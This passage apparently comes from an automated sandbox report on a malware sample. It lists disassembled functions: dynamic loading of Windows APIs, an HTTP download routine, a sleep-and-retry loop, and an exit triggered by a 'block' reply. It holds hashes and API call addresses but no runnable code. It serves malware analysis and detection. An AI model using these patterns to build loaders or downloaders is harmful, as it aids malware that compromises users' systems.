                                  Function 00249C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 633 249c10-249c1a 634 24a036-24a0ca LoadLibraryA * 8 633->634 635 249c20-24a031 GetProcAddress * 43 633->635 636 24a146-24a14d 634->636 637 24a0cc-24a141 GetProcAddress * 5 634->637 635->634 638 24a216-24a21d 636->638 639 24a153-24a211 GetProcAddress * 8 636->639 637->636 640 24a21f-24a293 GetProcAddress * 5 638->640 641 24a298-24a29f 638->641 639->638 640->641 642 24a2a5-24a332 GetProcAddress * 6 641->642 643 24a337-24a33e 641->643 642->643 644 24a344-24a41a GetProcAddress * 9 643->644 645 24a41f-24a426 643->645 644->645 646 24a4a2-24a4a9 645->646 647 24a428-24a49d GetProcAddress * 5 645->647 648 24a4dc-24a4e3 646->648 649 24a4ab-24a4d7 GetProcAddress * 2 646->649 647->646 650 24a515-24a51c 648->650 651 24a4e5-24a510 GetProcAddress * 2 648->651 649->648 652 24a612-24a619 650->652 653 24a522-24a60d GetProcAddress * 10 650->653 651->650 654 24a67d-24a684 652->654 655 24a61b-24a678 GetProcAddress * 4 652->655 653->652 656 24a686-24a699 GetProcAddress 654->656 657 24a69e-24a6a5 654->657 655->654 656->657 658 24a6a7-24a703 GetProcAddress * 4 657->658 659 24a708-24a709 657->659 658->659
                                  APIs
                                  • GetProcAddress.KERNEL32(76210000,010352C8), ref: 00249C2D
                                  • GetProcAddress.KERNEL32(76210000,01035328), ref: 00249C45
                                  • GetProcAddress.KERNEL32(76210000,01049040), ref: 00249C5E
                                  • GetProcAddress.KERNEL32(76210000,01048FE0), ref: 00249C76
                                  • GetProcAddress.KERNEL32(76210000,01049028), ref: 00249C8E
                                  • GetProcAddress.KERNEL32(76210000,0104DD48), ref: 00249CA7
                                  • GetProcAddress.KERNEL32(76210000,0103A928), ref: 00249CBF
                                  • GetProcAddress.KERNEL32(76210000,0104DD78), ref: 00249CD7
                                  • GetProcAddress.KERNEL32(76210000,0104DD60), ref: 00249CF0
                                  • GetProcAddress.KERNEL32(76210000,0104DB68), ref: 00249D08
                                  • GetProcAddress.KERNEL32(76210000,0104DCE8), ref: 00249D20
                                  • GetProcAddress.KERNEL32(76210000,01035308), ref: 00249D39
                                  • GetProcAddress.KERNEL32(76210000,010350A8), ref: 00249D51
                                  • GetProcAddress.KERNEL32(76210000,01034F48), ref: 00249D69
                                  • GetProcAddress.KERNEL32(76210000,01035188), ref: 00249D82
                                  • GetProcAddress.KERNEL32(76210000,0104DCD0), ref: 00249D9A
                                  • GetProcAddress.KERNEL32(76210000,0104DAD8), ref: 00249DB2
                                  • GetProcAddress.KERNEL32(76210000,0103A810), ref: 00249DCB
                                  • GetProcAddress.KERNEL32(76210000,01034F68), ref: 00249DE3
                                  • GetProcAddress.KERNEL32(76210000,0104DC58), ref: 00249DFB
                                  • GetProcAddress.KERNEL32(76210000,0104DB38), ref: 00249E14
                                  • GetProcAddress.KERNEL32(76210000,0104DB80), ref: 00249E2C
                                  • GetProcAddress.KERNEL32(76210000,0104DB08), ref: 00249E44
                                  • GetProcAddress.KERNEL32(76210000,010350E8), ref: 00249E5D
                                  • GetProcAddress.KERNEL32(76210000,0104DBE0), ref: 00249E75
                                  • GetProcAddress.KERNEL32(76210000,0104DD90), ref: 00249E8D
                                  • GetProcAddress.KERNEL32(76210000,0104DAF0), ref: 00249EA6
                                  • GetProcAddress.KERNEL32(76210000,0104DCB8), ref: 00249EBE
                                  • GetProcAddress.KERNEL32(76210000,0104DBF8), ref: 00249ED6
                                  • GetProcAddress.KERNEL32(76210000,0104DDA8), ref: 00249EEF
                                  • GetProcAddress.KERNEL32(76210000,0104DC70), ref: 00249F07
                                  • GetProcAddress.KERNEL32(76210000,0104DB98), ref: 00249F1F
                                  • GetProcAddress.KERNEL32(76210000,0104DB50), ref: 00249F38
                                  • GetProcAddress.KERNEL32(76210000,0103FD18), ref: 00249F50
                                  • GetProcAddress.KERNEL32(76210000,0104DC10), ref: 00249F68
                                  • GetProcAddress.KERNEL32(76210000,0104DD30), ref: 00249F81
                                  • GetProcAddress.KERNEL32(76210000,01034F88), ref: 00249F99
                                  • GetProcAddress.KERNEL32(76210000,0104DBB0), ref: 00249FB1
                                  • GetProcAddress.KERNEL32(76210000,010351A8), ref: 00249FCA
                                  • GetProcAddress.KERNEL32(76210000,0104DC28), ref: 00249FE2
                                  • GetProcAddress.KERNEL32(76210000,0104DAC0), ref: 00249FFA
                                  • GetProcAddress.KERNEL32(76210000,01035108), ref: 0024A013
                                  • GetProcAddress.KERNEL32(76210000,01035028), ref: 0024A02B
                                  • LoadLibraryA.KERNEL32(0104DC40,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A03D
                                  • LoadLibraryA.KERNEL32(0104DBC8,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A04E
                                  • LoadLibraryA.KERNEL32(0104DC88,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A060
                                  • LoadLibraryA.KERNEL32(0104DCA0,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A072
                                  • LoadLibraryA.KERNEL32(0104DD00,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A083
                                  • LoadLibraryA.KERNEL32(0104DD18,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A095
                                  • LoadLibraryA.KERNEL32(0104DB20,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A0A7
                                  • LoadLibraryA.KERNEL32(0104DE08,?,00245CA3,00250AEB,?,?,?,?,?,?,?,?,?,?,00250AEA,00250AE3), ref: 0024A0B8
                                  • GetProcAddress.KERNEL32(751E0000,01035148), ref: 0024A0DA
                                  • GetProcAddress.KERNEL32(751E0000,0104DE50), ref: 0024A0F2
                                  • GetProcAddress.KERNEL32(751E0000,01048958), ref: 0024A10A
                                  • GetProcAddress.KERNEL32(751E0000,0104DEF8), ref: 0024A123
                                  • GetProcAddress.KERNEL32(751E0000,010351C8), ref: 0024A13B
                                  • GetProcAddress.KERNEL32(701C0000,0103A860), ref: 0024A160
                                  • GetProcAddress.KERNEL32(701C0000,010355A8), ref: 0024A179
                                  • GetProcAddress.KERNEL32(701C0000,0103A568), ref: 0024A191
                                  • GetProcAddress.KERNEL32(701C0000,0104DE68), ref: 0024A1A9
                                  • GetProcAddress.KERNEL32(701C0000,0104DDF0), ref: 0024A1C2
                                  • GetProcAddress.KERNEL32(701C0000,01035568), ref: 0024A1DA
                                  • GetProcAddress.KERNEL32(701C0000,01035408), ref: 0024A1F2
                                  • GetProcAddress.KERNEL32(701C0000,0104DE98), ref: 0024A20B
                                  • GetProcAddress.KERNEL32(753A0000,01035508), ref: 0024A22C
                                  • GetProcAddress.KERNEL32(753A0000,01035588), ref: 0024A244
                                  • GetProcAddress.KERNEL32(753A0000,0104DEE0), ref: 0024A25D
                                  • GetProcAddress.KERNEL32(753A0000,0104DF40), ref: 0024A275
                                  • GetProcAddress.KERNEL32(753A0000,010356A8), ref: 0024A28D
                                  • GetProcAddress.KERNEL32(76310000,0103A590), ref: 0024A2B3
                                  • GetProcAddress.KERNEL32(76310000,0103A8B0), ref: 0024A2CB
                                  • GetProcAddress.KERNEL32(76310000,0104DF70), ref: 0024A2E3
                                  • GetProcAddress.KERNEL32(76310000,01035348), ref: 0024A2FC
                                  • GetProcAddress.KERNEL32(76310000,01035468), ref: 0024A314
                                  • GetProcAddress.KERNEL32(76310000,0103A8D8), ref: 0024A32C
                                  • GetProcAddress.KERNEL32(76910000,0104DF10), ref: 0024A352
                                  • GetProcAddress.KERNEL32(76910000,01035448), ref: 0024A36A
                                  • GetProcAddress.KERNEL32(76910000,01048978), ref: 0024A382
                                  • GetProcAddress.KERNEL32(76910000,0104DF28), ref: 0024A39B
                                  • GetProcAddress.KERNEL32(76910000,0104DF58), ref: 0024A3B3
                                  • GetProcAddress.KERNEL32(76910000,010356C8), ref: 0024A3CB
                                  • GetProcAddress.KERNEL32(76910000,010353C8), ref: 0024A3E4
                                  • GetProcAddress.KERNEL32(76910000,0104DE20), ref: 0024A3FC
                                  • GetProcAddress.KERNEL32(76910000,0104DDC0), ref: 0024A414
                                  • GetProcAddress.KERNEL32(75B30000,01035428), ref: 0024A436
                                  • GetProcAddress.KERNEL32(75B30000,0104DE38), ref: 0024A44E
                                  • GetProcAddress.KERNEL32(75B30000,0104DDD8), ref: 0024A466
                                  • GetProcAddress.KERNEL32(75B30000,0104DE80), ref: 0024A47F
                                  • GetProcAddress.KERNEL32(75B30000,0104DEB0), ref: 0024A497
                                  • GetProcAddress.KERNEL32(75670000,01035488), ref: 0024A4B8
                                  • GetProcAddress.KERNEL32(75670000,01035688), ref: 0024A4D1
                                  • GetProcAddress.KERNEL32(76AC0000,01035648), ref: 0024A4F2
                                  • GetProcAddress.KERNEL32(76AC0000,0104DEC8), ref: 0024A50A
                                  • GetProcAddress.KERNEL32(6F4E0000,01035608), ref: 0024A530
                                  • GetProcAddress.KERNEL32(6F4E0000,010355C8), ref: 0024A548
                                  • GetProcAddress.KERNEL32(6F4E0000,010354A8), ref: 0024A560
                                  • GetProcAddress.KERNEL32(6F4E0000,0104D928), ref: 0024A579
                                  • GetProcAddress.KERNEL32(6F4E0000,01035548), ref: 0024A591
                                  • GetProcAddress.KERNEL32(6F4E0000,010354C8), ref: 0024A5A9
                                  • GetProcAddress.KERNEL32(6F4E0000,010354E8), ref: 0024A5C2
                                  • GetProcAddress.KERNEL32(6F4E0000,01035528), ref: 0024A5DA
                                  • GetProcAddress.KERNEL32(6F4E0000,InternetSetOptionA), ref: 0024A5F1
                                  • GetProcAddress.KERNEL32(6F4E0000,HttpQueryInfoA), ref: 0024A607
                                  • GetProcAddress.KERNEL32(75AE0000,0104D8B0), ref: 0024A629
                                  • GetProcAddress.KERNEL32(75AE0000,01048988), ref: 0024A641
                                  • GetProcAddress.KERNEL32(75AE0000,0104DAA8), ref: 0024A659
                                  • GetProcAddress.KERNEL32(75AE0000,0104D940), ref: 0024A672
                                  • GetProcAddress.KERNEL32(76300000,010356E8), ref: 0024A693
                                  • GetProcAddress.KERNEL32(6D4F0000,0104D910), ref: 0024A6B4
                                  • GetProcAddress.KERNEL32(6D4F0000,010355E8), ref: 0024A6CD
                                  • GetProcAddress.KERNEL32(6D4F0000,0104DA00), ref: 0024A6E5
                                  • GetProcAddress.KERNEL32(6D4F0000,0104D9A0), ref: 0024A6FD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: HttpQueryInfoA$InternetSetOptionA
                                  • API String ID: 2238633743-1775429166
                                  • Opcode ID: b92877963656a93befa0d1255acd536a854a73bdbd58160e456c87d7c0089be4
                                  • Instruction ID: cafc2c7d961f2a30b3116272463d87057849e2223073f66a015782b3354ea92b
                                  • Opcode Fuzzy Hash: b92877963656a93befa0d1255acd536a854a73bdbd58160e456c87d7c0089be4
                                  • Instruction Fuzzy Hash: 84624AB5504200AFC348EFB8ED8996E77F9F7CC201715853AA60DC3264D63998E5CB6B
                                  Function 00236280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1033 236280-23630b call 24a7a0 call 2347b0 call 24a740 InternetOpenA StrCmpCA 1040 236314-236318 1033->1040 1041 23630d 1033->1041 1042 236509-236525 call 24a7a0 call 24a800 * 2 1040->1042 1043 23631e-236342 InternetConnectA 1040->1043 1041->1040 1061 236528-23652d 1042->1061 1044 236348-23634c 1043->1044 1045 2364ff-236503 InternetCloseHandle 1043->1045 1047 23635a 1044->1047 1048 23634e-236358 1044->1048 1045->1042 1050 236364-236392 HttpOpenRequestA 1047->1050 1048->1050 1052 2364f5-2364f9 InternetCloseHandle 1050->1052 1053 236398-23639c 1050->1053 1052->1045 1055 2363c5-236405 HttpSendRequestA HttpQueryInfoA 1053->1055 1056 23639e-2363bf InternetSetOptionA 1053->1056 1058 236407-236427 call 24a740 call 24a800 * 2 1055->1058 1059 23642c-23644b call 248940 1055->1059 1056->1055 1058->1061 1066 2364c9-2364e9 call 24a740 call 24a800 * 2 1059->1066 1067 23644d-236454 1059->1067 1066->1061 1070 2364c7-2364ef InternetCloseHandle 1067->1070 1071 236456-236480 InternetReadFile 1067->1071 1070->1052 1074 236482-236489 1071->1074 1075 23648b 1071->1075 1074->1075 1079 23648d-2364c5 call 24a9b0 call 24a8a0 call 24a800 1074->1079 1075->1070 1079->1071
                                  APIs
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002347B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00234839
                                    • Part of subcall function 002347B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00234849
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • InternetOpenA.WININET(00250DFE,00000001,00000000,00000000,00000000), ref: 002362E1
                                  • StrCmpCA.SHLWAPI(?,0104FCA0), ref: 00236303
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00236335
                                  • HttpOpenRequestA.WININET(00000000,GET,?,0104F3F8,00000000,00000000,00400100,00000000), ref: 00236385
                                  • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 002363BF
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002363D1
                                  • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 002363FD
                                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0023646D
                                  • InternetCloseHandle.WININET(00000000), ref: 002364EF
                                  • InternetCloseHandle.WININET(00000000), ref: 002364F9
                                  • InternetCloseHandle.WININET(00000000), ref: 00236503
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                                  • String ID: ERROR$ERROR$GET
                                  • API String ID: 3749127164-2509457195
                                  • Opcode ID: 3f43cc89e6edad02da8f3386daba66bc1ed864c363f8638440867bdaa79e6f94
                                  • Instruction ID: 2007cbc18832e6297e23d95110db65ee0748df292957f8a0e21739c8ccc8849e
                                  • Opcode Fuzzy Hash: 3f43cc89e6edad02da8f3386daba66bc1ed864c363f8638440867bdaa79e6f94
                                  • Instruction Fuzzy Hash: 327153B1A60218ABEB24DF90CC49FEEB778FB44700F108198F5096B190DBB46A95CF51
                                  Function 00245510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1090 245510-245577 call 245ad0 call 24a820 * 3 call 24a740 * 4 1106 24557c-245583 1090->1106 1107 245585-2455b6 call 24a820 call 24a7a0 call 231590 call 2451f0 1106->1107 1108 2455d7-24564c call 24a740 * 2 call 231590 call 2452c0 call 24a8a0 call 24a800 call 24aad0 StrCmpCA 1106->1108 1124 2455bb-2455d2 call 24a8a0 call 24a800 1107->1124 1134 245693-2456a9 call 24aad0 StrCmpCA 1108->1134 1138 24564e-24568e call 24a7a0 call 231590 call 2451f0 call 24a8a0 call 24a800 1108->1138 1124->1134 1139 2457dc-245844 call 24a8a0 call 24a820 * 2 call 231670 call 24a800 * 4 call 246560 call 231550 1134->1139 1140 2456af-2456b6 1134->1140 1138->1134 1270 245ac3-245ac6 1139->1270 1143 2456bc-2456c3 1140->1143 1144 2457da-24585f call 24aad0 StrCmpCA 1140->1144 1148 2456c5-245719 call 24a820 call 24a7a0 call 231590 call 2451f0 call 24a8a0 call 24a800 1143->1148 1149 24571e-245793 call 24a740 * 2 call 231590 call 2452c0 call 24a8a0 call 24a800 call 24aad0 StrCmpCA 1143->1149 1163 245865-24586c 1144->1163 1164 245991-2459f9 call 24a8a0 call 24a820 * 2 call 231670 call 24a800 * 4 call 246560 call 231550 1144->1164 1148->1144 1149->1144 1249 245795-2457d5 call 24a7a0 call 231590 call 2451f0 call 24a8a0 call 24a800 1149->1249 1170 245872-245879 1163->1170 1171 24598f-245a14 call 24aad0 StrCmpCA 1163->1171 1164->1270 1178 2458d3-245948 call 24a740 * 2 call 231590 call 2452c0 call 24a8a0 call 24a800 call 24aad0 StrCmpCA 1170->1178 1179 24587b-2458ce call 24a820 call 24a7a0 call 231590 call 2451f0 call 24a8a0 call 24a800 1170->1179 1199 245a16-245a21 Sleep 1171->1199 1200 245a28-245a91 call 24a8a0 call 24a820 * 2 call 231670 call 24a800 * 4 call 246560 call 231550 1171->1200 1178->1171 1275 24594a-24598a call 24a7a0 call 231590 call 2451f0 call 24a8a0 call 24a800 1178->1275 1179->1171 1199->1106 1200->1270 1249->1144 1275->1171
                                  APIs
                                    • Part of subcall function 0024A820: lstrlen.KERNEL32(00234F05,?,?,00234F05,00250DDE), ref: 0024A82B
                                    • Part of subcall function 0024A820: lstrcpy.KERNEL32(00250DDE,00000000), ref: 0024A885
                                    • Part of subcall function 0024A740: lstrcpy.KERNEL32(00250E17,00000000), ref: 0024A788
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00245644
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 002456A1
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00245857
                                    • Part of subcall function 0024A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0024A7E6
                                    • Part of subcall function 002451F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00245228
                                    • Part of subcall function 0024A8A0: lstrcpy.KERNEL32(?,00250E17), ref: 0024A905
                                    • Part of subcall function 002452C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00245318
                                    • Part of subcall function 002452C0: lstrlen.KERNEL32(00000000), ref: 0024532F
                                    • Part of subcall function 002452C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00245364
                                    • Part of subcall function 002452C0: lstrlen.KERNEL32(00000000), ref: 00245383
                                    • Part of subcall function 002452C0: lstrlen.KERNEL32(00000000), ref: 002453AE
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0024578B
                                  • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00245940
                                  • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00245A0C
                                  • Sleep.KERNEL32(0000EA60), ref: 00245A1B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen$Sleep
                                  • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                                  • API String ID: 507064821-2791005934
                                  • Opcode ID: c4ab5bb81d1f9b7c8ed272177f17bfeea295fab1308007836ad040a76d2b9b93
                                  • Instruction ID: 5ea3b779899969af011b929d2536d4be9b41f6b7566a5ceee1f02bb03c0f1d4b
                                  • Opcode Fuzzy Hash: c4ab5bb81d1f9b7c8ed272177f17bfeea295fab1308007836ad040a76d2b9b93
                                  • Instruction Fuzzy Hash: 20E1FC72970104ABDB1CFBA0DC97AED7378AB94300F508528B50766192EF346A7DCF96
                                  Function 002417A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 1301 2417a0-2417cd call 24aad0 StrCmpCA 1304 2417d7-2417f1 call 24aad0 1301->1304 1305 2417cf-2417d1 ExitProcess 1301->1305 1309 2417f4-2417f8 1304->1309 1310 2419c2-2419cd call 24a800 1309->1310 1311 2417fe-241811 1309->1311 1313 241817-24181a 1311->1313 1314 24199e-2419bd 1311->1314 1316 241821-241830 call 24a820 1313->1316 1317 2418ad-2418be StrCmpCA 1313->1317 1318 2418cf-2418e0 StrCmpCA 1313->1318 1319 24198f-241999 call 24a820 1313->1319 1320 241849-241858 call 24a820 1313->1320 1321 241835-241844 call 24a820 1313->1321 1322 241970-241981 StrCmpCA 1313->1322 1323 2418f1-241902 StrCmpCA 1313->1323 1324 241951-241962 StrCmpCA 1313->1324 1325 241932-241943 StrCmpCA 1313->1325 1326 241913-241924 StrCmpCA 1313->1326 1327 24185d-24186e StrCmpCA 1313->1327 1328 24187f-241890 StrCmpCA 1313->1328 1314->1309 1316->1314 1333 2418c0-2418c3 1317->1333 1334 2418ca 1317->1334 1335 2418e2-2418e5 1318->1335 1336 2418ec 1318->1336 1319->1314 1320->1314 1321->1314 1346 241983-241986 1322->1346 1347 24198d 1322->1347 1337 241904-241907 1323->1337 1338 24190e 1323->1338 1343 241964-241967 1324->1343 1344 24196e 1324->1344 1341 241945-241948 1325->1341 1342 24194f 1325->1342 1339 241926-241929 1326->1339 1340 241930 1326->1340 1329 241870-241873 1327->1329 1330 24187a 1327->1330 1331 241892-24189c 1328->1331 1332 24189e-2418a1 1328->1332 1329->1330 1330->1314 1352 2418a8 1331->1352 1332->1352 1333->1334 1334->1314 1335->1336 1336->1314 1337->1338 1338->1314 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1346->1347 1347->1314 1352->1314
                                  APIs
                                  • StrCmpCA.SHLWAPI(00000000,block), ref: 002417C5
                                  • ExitProcess.KERNEL32 ref: 002417D1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2170383970.0000000000231000.00000040.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                  • Associated: 00000000.00000002.2170366008.0000000000230000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.0000000000312000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170383970.000000000047A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000048E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.000000000061F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.00000000006F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170568728.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170818052.0000000000731000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170913762.00000000008CC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2170926050.00000000008CD000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_230000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ExitProcess
                                  • String ID: block
                                  • API String ID: 621844428-2199623458
                                  • Opcode ID: f0ecb2de45248d920938a278630f70846d367f0ce96d6acdb3d4aef6dc898b24
                                  • Instruction ID: 6abc97ff13a3dcd754dbcefa25736de07402eb5621bedffbca0d7e9bed28c216
                                  • Opcode Fuzzy Hash: f0ecb2de45248d920938a278630f70846d367f0ce96d6acdb3d4aef6dc898b24
                                  • Instruction Fuzzy Hash: EC512BB5B2420AEBDB08DFA0D994ABE77B5FF44704F108058E806A7244D770A9B5CB66
                                  Function 00247500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
